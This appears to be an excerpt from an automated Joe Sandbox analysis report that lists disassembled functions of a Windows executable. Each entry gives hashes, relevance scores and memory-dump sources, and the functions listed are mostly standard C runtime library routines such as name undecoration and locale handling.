Snapshot File: hcaresult_0_2_1000000_file.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 01ffdcfc4a170f1596b26d300e4d9eeb94101c14574aad42e0c58a83c969e199
Instruction ID: 404fbd5114ee061a16875389609e8173b9e658e444213a6a548e67066e2f9f23
Opcode Fuzzy Hash: 01ffdcfc4a170f1596b26d300e4d9eeb94101c14574aad42e0c58a83c969e199
Instruction Fuzzy Hash: 21F08C32A04124EBCF21CF99D804AAEFBB9EB47360F15B095E449B3200C330ED10DBA8

Function 0102D01B Relevance: .0, Instructions: 31COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2103299834.000000000102C000.00000004.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2103186471.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103211179.0000000001001000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103277585.0000000001022000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103362948.000000000108C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103389180.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103413797.000000000108F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_file.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e47e57290291bf3e55fc76926b40b9455446aaecab0376499f589c11769486e1
Instruction ID: ea3e4387b39ce806ce78312b7a9645757156f0a8d6b1af2c7d6898ca67931afe
Opcode Fuzzy Hash: e47e57290291bf3e55fc76926b40b9455446aaecab0376499f589c11769486e1
Instruction Fuzzy Hash: 77F03072900A19AFD714CFADD5415DFFBF8EB48320B10856ED4AAF3260D630FA458B51

Function 0104458A Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2103299834.000000000102C000.00000004.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2103186471.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103211179.0000000001001000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103277585.0000000001022000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103362948.000000000108C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103389180.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103413797.000000000108F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_file.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f8d911352b7be11e8ef3f8d43dc69cd37138e10f06c97852b63a715cd4b250d5
Instruction ID: d256f1c99479b207678580fcb63197705f640815169115519c5f26934de16b0c
Opcode Fuzzy Hash: f8d911352b7be11e8ef3f8d43dc69cd37138e10f06c97852b63a715cd4b250d5
Instruction Fuzzy Hash: 1AE06C78A61648EFC740CF48C185E49B3F8FB09768F118095E905DB321C378EE00EB50

Function 0102D36A Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2103299834.000000000102C000.00000004.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2103186471.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103211179.0000000001001000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103277585.0000000001022000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103362948.000000000108C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103389180.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103413797.000000000108F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_file.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f1937a1b08348a57b00ab59f39d03f042d4a1f0e171b8ae631e82396fa0be247
Instruction ID: 6edc1f77bc014f77afb1dd4525fcd7db61d9a3eb149a076bd6fc7a55924a73f3
Opcode Fuzzy Hash: f1937a1b08348a57b00ab59f39d03f042d4a1f0e171b8ae631e82396fa0be247
Instruction Fuzzy Hash: D9C08C72529208EFD70DCB84D613F5AB3FCE704758F10409CE00293780C67DAB00CA58

Function 0102D382 Relevance: .0, Instructions: 3COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2103299834.000000000102C000.00000004.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2103186471.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103211179.0000000001001000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103277585.0000000001022000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103362948.000000000108C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103389180.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103413797.000000000108F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_file.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 17de449bc8e75433a69f048acdc393cdc02c9d7c97a966a586413745d476a19c
Instruction ID: 5941d710df6caaa93d6ffa2de60dce8e613dec4f923ccdd24a2439a3e016513d
Opcode Fuzzy Hash: 17de449bc8e75433a69f048acdc393cdc02c9d7c97a966a586413745d476a19c
Instruction Fuzzy Hash: DAA002315569D48ECE53D7158260F207BB8A741A41F0504D1E491C6863C11CDA50D950

Function 0104E556 Relevance: 54.3, APIs: 36, Instructions: 344COMMONLIBRARYCODE

Download Yara Rule

APIs

operator+.LIBCMT ref: 0104E571

Part of subcall function 0104B680: DName::DName.LIBCMT ref: 0104B693
Part of subcall function 0104B680: DName::operator+.LIBCMT ref: 0104B69A

Memory Dump Source

Source File: 00000000.00000002.2103299834.000000000102C000.00000004.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2103186471.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103211179.0000000001001000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103277585.0000000001022000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103362948.000000000108C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103389180.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103413797.000000000108F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_file.jbxd

Yara matches

Similarity

API ID: NameName::Name::operator+operator+
String ID:
API String ID: 2937105810-0
Opcode ID: 2d53c3902569e9784ef8fb12d3ca9c9f454977bad3efebfb259204c3ad6fcad2
Instruction ID: 4aaa9d31530ee6a25365ca06f8b428ab98abe52a0b974b2bbf0ab1fd9a481e42
Opcode Fuzzy Hash: 2d53c3902569e9784ef8fb12d3ca9c9f454977bad3efebfb259204c3ad6fcad2
Instruction Fuzzy Hash: D1D1FCB5900209AFDF10EFA8C8D5AEEBBF4BF18210F504079E586E7291EB34DA45CB50

Function 0104F29E Relevance: 27.3, APIs: 18, Instructions: 274COMMONLIBRARYCODE

Download Yara Rule

APIs

UnDecorator::getECSUDataType.LIBCMT ref: 0104F43D
DName::operator=.LIBCMT ref: 0104F4EB
DName::operator+=.LIBCMT ref: 0104F516
DName::DName.LIBCMT ref: 0104F57B
DName::operator+.LIBCMT ref: 0104F582
DName::DName.LIBCMT ref: 0104F5A5
DName::operator+.LIBCMT ref: 0104F5AC
DName::operator+=.LIBCMT ref: 0104F5B8
DName::operator=.LIBCMT ref: 0104F5DF
DName::operator+=.LIBCMT ref: 0104F5F1
UnDecorator::getPtrRefType.LIBCMT ref: 0104F61A
operator+.LIBCMT ref: 0104F62C

Memory Dump Source

Source File: 00000000.00000002.2103299834.000000000102C000.00000004.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2103186471.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103211179.0000000001001000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103277585.0000000001022000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103362948.000000000108C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103389180.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103413797.000000000108F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_file.jbxd

Yara matches

Similarity

API ID: Name::operator+=$Decorator::getNameName::Name::operator+Name::operator=Type$Dataoperator+
String ID:
API String ID: 1129569759-0
Opcode ID: 30b1e72d88142c82e2d5552c373b89b4dacb89b85ea205a481f88f5b85183262
Instruction ID: c02c4bd43bf75e901d7bf078e4483d45318988fd1dd6b24446804f80d39896b0
Opcode Fuzzy Hash: 30b1e72d88142c82e2d5552c373b89b4dacb89b85ea205a481f88f5b85183262
Instruction Fuzzy Hash: 8391A1F190020BABDF24EEACC8C5AFD7BB4AF59312F2481B6E691D6191DB34D640CA51

Function 01054B14 Relevance: 24.1, APIs: 16, Instructions: 95COMMON

Download Yara Rule

APIs

__calloc_crt.LIBCMT ref: 01054B2D
__calloc_crt.LIBCMT ref: 01054B51
_free.LIBCMT ref: 01054B5F
__calloc_crt.LIBCMT ref: 01054B6D
_free.LIBCMT ref: 01054B7D
_free.LIBCMT ref: 01054B83
__copytlocinfo_nolock.LIBCMT ref: 01054B92
__setlocale_nolock.LIBCMT ref: 01054B9F
___removelocaleref.LIBCMT ref: 01054BAB
___freetlocinfo.LIBCMT ref: 01054BB2
_free.LIBCMT ref: 01054BB8
__setmbcp_nolock.LIBCMT ref: 01054BCA
_free.LIBCMT ref: 01054BD8
___removelocaleref.LIBCMT ref: 01054BDF
___freetlocinfo.LIBCMT ref: 01054BE6
_free.LIBCMT ref: 01054BEC

Memory Dump Source

Source File: 00000000.00000002.2103299834.000000000102C000.00000004.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2103186471.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103211179.0000000001001000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103277585.0000000001022000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103362948.000000000108C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103389180.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103413797.000000000108F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_file.jbxd

Yara matches

Similarity

API ID: _free$__calloc_crt$___freetlocinfo___removelocaleref$__copytlocinfo_nolock__setlocale_nolock__setmbcp_nolock
String ID:
API String ID: 2193103758-0
Opcode ID: 784abcef5afcd593a1ca4234ae08e44cf487d9407e5e4ef41eebf28f0038ada9
Instruction ID: c30f595ce96fe720cc1344d69785ae8fc852a9edff8e9b17cf86e04dce21e137
Opcode Fuzzy Hash: 784abcef5afcd593a1ca4234ae08e44cf487d9407e5e4ef41eebf28f0038ada9
Instruction Fuzzy Hash: 0D21B175104603EBEBB27F2DD840ADBBBE5EFA9750F208439ECC496161EF3198808A51

Function 0104B942 Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 77COMMONLIBRARYCODE

Download Yara Rule

APIs

UnDecorator::getArgumentList.LIBCMT ref: 0104B967

Part of subcall function 0104B502: Replicator::operator[].LIBCMT ref: 0104B585
Part of subcall function 0104B502: DName::operator+=.LIBCMT ref: 0104B58D

DName::operator+.LIBCMT ref: 0104B9C0
DName::DName.LIBCMT ref: 0104BA18

Strings

4;C, xrefs: 0104B9FB
(;C, xrefs: 0104BA02
D;C, xrefs: 0104B9AC
8;C, xrefs: 0104B9B3

Memory Dump Source

Source File: 00000000.00000002.2103299834.000000000102C000.00000004.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2103186471.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103211179.0000000001001000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103277585.0000000001022000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103362948.000000000108C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103389180.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103413797.000000000108F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_file.jbxd

Yara matches

Similarity

API ID: ArgumentDecorator::getListNameName::Name::operator+Name::operator+=Replicator::operator[]
String ID: (;C$4;C$8;C$D;C
API String ID: 834187326-2621726175
Opcode ID: a0090458237679d067ced1afd8bb8c1e263f460860677f0579ee007d7b594e8e
Instruction ID: 86d3f2d31433df09fcfab2cc1cce7f9aaf31091c1547ff5351a220ee3b54e1c0
Opcode Fuzzy Hash: a0090458237679d067ced1afd8bb8c1e263f460860677f0579ee007d7b594e8e
Instruction Fuzzy Hash: 212183B4601248AFDB11DF1CD4849A97BF4FF0934BB4480A9E885DB366E734E942CB44

Function 0100A318 Relevance: 10.8, APIs: 3, Strings: 3, Instructions: 303COMMONLIBRARYCODE

Download Yara Rule

APIs

type_info::operator==.LIBVCRUNTIME ref: 0100A437
___TypeMatch.LIBVCRUNTIME ref: 0100A545
CallUnexpected.LIBVCRUNTIME ref: 0100A6B2

Strings

csm, xrefs: 0100A46E
csm, xrefs: 0100A3C2
csm, xrefs: 0100A355

Memory Dump Source

Source File: 00000000.00000002.2103211179.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2103186471.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103277585.0000000001022000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103299834.000000000102C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103362948.000000000108C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103389180.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103413797.000000000108F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_file.jbxd

Yara matches

Similarity

API ID: CallMatchTypeUnexpectedtype_info::operator==
String ID: csm$csm$csm
API String ID: 1206542248-393685449
Opcode ID: 5c9436183d504527a060d3380065e2138a7741e5400ab2d91e9aaac4b7732afa
Instruction ID: 8b3a2871641ff5b05d59860f09a729c00d94b1e36211214682f38a14f71d43ea
Opcode Fuzzy Hash: 5c9436183d504527a060d3380065e2138a7741e5400ab2d91e9aaac4b7732afa
Instruction Fuzzy Hash: 71B17E75E00309DFEF17DFA8C8409AEBBB5BF58310F15819AE8856B282D731DA51CB91

Function 0104D2DB Relevance: 10.6, APIs: 7, Instructions: 55COMMONLIBRARYCODE

Download Yara Rule

APIs

UnDecorator::UScore.LIBCMT ref: 0104D2E5
DName::DName.LIBCMT ref: 0104D2F1

Part of subcall function 0104AFBC: DName::doPchar.LIBCMT ref: 0104AFED

UnDecorator::getScopedName.LIBCMT ref: 0104D330
DName::operator+=.LIBCMT ref: 0104D33A
DName::operator+=.LIBCMT ref: 0104D349
DName::operator+=.LIBCMT ref: 0104D355
DName::operator+=.LIBCMT ref: 0104D362

Memory Dump Source

Source File: 00000000.00000002.2103299834.000000000102C000.00000004.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2103186471.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103211179.0000000001001000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103277585.0000000001022000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103362948.000000000108C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103389180.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103413797.000000000108F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_file.jbxd

Yara matches

Similarity

API ID: Name::operator+=$Name$Decorator::Decorator::getName::Name::doPcharScopedScore
String ID:
API String ID: 1480779885-0
Opcode ID: 23bb66ba7c0c68d0bfc5bce08223bbb55780766e01e2ba2a51e198509357868b
Instruction ID: 1ee03263a61eac58e008b463db6f62b198e3250869dd21731013566ab1c2a000
Opcode Fuzzy Hash: 23bb66ba7c0c68d0bfc5bce08223bbb55780766e01e2ba2a51e198509357868b
Instruction Fuzzy Hash: C9118AF1900145AFD715EF68C895BED7BB0AF20302F4440B9D496972D1DB70EA45C751

Function 0101F0A8 Relevance: 9.3, APIs: 6, Instructions: 298COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2103211179.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2103186471.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103277585.0000000001022000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103299834.000000000102C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103362948.000000000108C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103389180.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103413797.000000000108F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_file.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dec47a59f9a5a2e74a117a13a9af9b8788a4452161a5dd1c69174cc7d53e21bd
Instruction ID: 3a754885796ce59d8144644cfd4b3019ec6ae1c333b37d795a1718da142e4c28
Opcode Fuzzy Hash: dec47a59f9a5a2e74a117a13a9af9b8788a4452161a5dd1c69174cc7d53e21bd
Instruction Fuzzy Hash: FEB10270A042479FEB12DFDCC880BED7BF1AF85310F148199E590AB29AC7799946CB61

Function 0104F305 Relevance: 9.1, APIs: 6, Instructions: 71COMMON

Download Yara Rule

APIs

DName::operator=.LIBCMT ref: 0104F4EB

Part of subcall function 0104B2BC: DName::doPchar.LIBCMT ref: 0104B2E5

DName::DName.LIBCMT ref: 0104F57B
DName::operator+.LIBCMT ref: 0104F582
DName::DName.LIBCMT ref: 0104F5A5
DName::operator+.LIBCMT ref: 0104F5AC
DName::operator+=.LIBCMT ref: 0104F5B8
DName::operator=.LIBCMT ref: 0104F5DF
DName::operator+=.LIBCMT ref: 0104F5F1
DName::operator=.LIBCMT ref: 0104F605
UnDecorator::getPtrRefType.LIBCMT ref: 0104F61A
operator+.LIBCMT ref: 0104F62C

Memory Dump Source

Source File: 00000000.00000002.2103299834.000000000102C000.00000004.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2103186471.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103211179.0000000001001000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103277585.0000000001022000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103362948.000000000108C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103389180.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103413797.000000000108F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_file.jbxd

Yara matches

Similarity

API ID: Name::operator=$NameName::Name::operator+Name::operator+=$Decorator::getName::doPcharTypeoperator+
String ID:
API String ID: 4267394785-0
Opcode ID: 41adee5c73aa1e88243f3158e2c40ed16f52e1afc6b9bf2c17e63ec85b627ffa
Instruction ID: 5b9e17b2fb482ff116112f3de10c7b12dcde70e7ba7e1232d0067c1c24985651
Opcode Fuzzy Hash: 41adee5c73aa1e88243f3158e2c40ed16f52e1afc6b9bf2c17e63ec85b627ffa
Instruction Fuzzy Hash: 6721FEF6A0010BABDF58EEBCC9C89FDBBF4AB04201F4451B9D791D7595DA34DA01CA90

Function 0104F30F Relevance: 9.1, APIs: 6, Instructions: 71COMMON

Download Yara Rule

APIs

DName::operator=.LIBCMT ref: 0104F4EB

Part of subcall function 0104B2BC: DName::doPchar.LIBCMT ref: 0104B2E5

DName::DName.LIBCMT ref: 0104F57B
DName::operator+.LIBCMT ref: 0104F582
DName::DName.LIBCMT ref: 0104F5A5
DName::operator+.LIBCMT ref: 0104F5AC
DName::operator+=.LIBCMT ref: 0104F5B8
DName::operator=.LIBCMT ref: 0104F5DF
DName::operator+=.LIBCMT ref: 0104F5F1
DName::operator=.LIBCMT ref: 0104F605
UnDecorator::getPtrRefType.LIBCMT ref: 0104F61A
operator+.LIBCMT ref: 0104F62C

Memory Dump Source

Source File: 00000000.00000002.2103299834.000000000102C000.00000004.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2103186471.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103211179.0000000001001000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103277585.0000000001022000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103362948.000000000108C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103389180.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103413797.000000000108F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_file.jbxd

Yara matches

Similarity

API ID: Name::operator=$NameName::Name::operator+Name::operator+=$Decorator::getName::doPcharTypeoperator+
String ID:
API String ID: 4267394785-0
Opcode ID: fd9685c0f8e99762da6b47b8c6f7231e6a09b9523451af01b9522ecad555d412
Instruction ID: 7cb5d22db4c3323aba461977b3620675d836bcd3a55ab9ed3159b35ea8d2595c
Opcode Fuzzy Hash: fd9685c0f8e99762da6b47b8c6f7231e6a09b9523451af01b9522ecad555d412
Instruction Fuzzy Hash: A121FEF6A0010BABDF58EEBCC9C89FDBBF4AB04201F4451B9D791D7595DA34DA01CA90

Function 0104F319 Relevance: 9.1, APIs: 6, Instructions: 71COMMON

Download Yara Rule

APIs

DName::operator=.LIBCMT ref: 0104F4EB

Part of subcall function 0104B2BC: DName::doPchar.LIBCMT ref: 0104B2E5

DName::DName.LIBCMT ref: 0104F57B
DName::operator+.LIBCMT ref: 0104F582
DName::DName.LIBCMT ref: 0104F5A5
DName::operator+.LIBCMT ref: 0104F5AC
DName::operator+=.LIBCMT ref: 0104F5B8
DName::operator=.LIBCMT ref: 0104F5DF
DName::operator+=.LIBCMT ref: 0104F5F1
DName::operator=.LIBCMT ref: 0104F605
UnDecorator::getPtrRefType.LIBCMT ref: 0104F61A
operator+.LIBCMT ref: 0104F62C

Memory Dump Source

Source File: 00000000.00000002.2103299834.000000000102C000.00000004.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2103186471.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103211179.0000000001001000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103277585.0000000001022000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103362948.000000000108C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103389180.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103413797.000000000108F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_file.jbxd

Yara matches

Similarity

API ID: Name::operator=$NameName::Name::operator+Name::operator+=$Decorator::getName::doPcharTypeoperator+
String ID:
API String ID: 4267394785-0
Opcode ID: 04bf772949b8752548d84cbfff0da56238cecf44966dde39219307ebaddb036f
Instruction ID: a6994dbcae63c01cda2f77a17ce86b0c3252c65bb7b7c3032635c5db9b5cdccf
Opcode Fuzzy Hash: 04bf772949b8752548d84cbfff0da56238cecf44966dde39219307ebaddb036f
Instruction Fuzzy Hash: 1221FEF6A0010BABDF58EEBCC9C89FDBBF4AB04201F4451B9D791D7595DA34DA01CA90

Function 0104F2FB Relevance: 9.1, APIs: 6, Instructions: 71COMMON

Download Yara Rule

APIs

DName::operator=.LIBCMT ref: 0104F4EB

Part of subcall function 0104B2BC: DName::doPchar.LIBCMT ref: 0104B2E5

DName::DName.LIBCMT ref: 0104F57B
DName::operator+.LIBCMT ref: 0104F582
DName::DName.LIBCMT ref: 0104F5A5
DName::operator+.LIBCMT ref: 0104F5AC
DName::operator+=.LIBCMT ref: 0104F5B8
DName::operator=.LIBCMT ref: 0104F5DF
DName::operator+=.LIBCMT ref: 0104F5F1
DName::operator=.LIBCMT ref: 0104F605
UnDecorator::getPtrRefType.LIBCMT ref: 0104F61A
operator+.LIBCMT ref: 0104F62C

Memory Dump Source

Source File: 00000000.00000002.2103299834.000000000102C000.00000004.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2103186471.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103211179.0000000001001000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103277585.0000000001022000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103362948.000000000108C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103389180.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103413797.000000000108F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_file.jbxd

Yara matches

Similarity

API ID: Name::operator=$NameName::Name::operator+Name::operator+=$Decorator::getName::doPcharTypeoperator+
String ID:
API String ID: 4267394785-0
Opcode ID: c5ff01363cc5be2414fde705ddc2477139869efe325205967f2b79d65d07f3e5
Instruction ID: 7839ad378afde7546600a0f906d2b228ec9cac5626ff7f154344e5c1753f4c9a
Opcode Fuzzy Hash: c5ff01363cc5be2414fde705ddc2477139869efe325205967f2b79d65d07f3e5
Instruction Fuzzy Hash: 7B21FEF6A0010BABDF58EEBCC9C89FDBBF49B04201F4451B9D791D7595DA34DA01CA90

Function 010050F8 Relevance: 9.1, APIs: 6, Instructions: 65COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 010050FF
std::_Lockit::_Lockit.LIBCPMT ref: 01005109
int.LIBCPMT ref: 01005120

Part of subcall function 010016B4: std::_Lockit::_Lockit.LIBCPMT ref: 010016C5
Part of subcall function 010016B4: std::_Lockit::~_Lockit.LIBCPMT ref: 010016DF

std::_Facet_Register.LIBCPMT ref: 0100515A
std::_Lockit::~_Lockit.LIBCPMT ref: 0100517A
Concurrency::cancel_current_task.LIBCPMT ref: 01005187

Memory Dump Source

Source File: 00000000.00000002.2103211179.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2103186471.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103277585.0000000001022000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103299834.000000000102C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103362948.000000000108C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103389180.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103413797.000000000108F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_file.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
String ID:
API String ID: 55977855-0
Opcode ID: 26471b45bbff7d316a6aa12e70255d3dff070e7b9f8cc18de62103850610867b
Instruction ID: 28fb909009b8040e1c9477f849f256b66784b21f86bee6dec28cc1a194677ea8
Opcode Fuzzy Hash: 26471b45bbff7d316a6aa12e70255d3dff070e7b9f8cc18de62103850610867b
Instruction Fuzzy Hash: BD11B17590022A9BEB16FBA8D804AFE77F5BF68320F240509E4C5A72C0DF749E00CB94

Function 01009FAA Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE

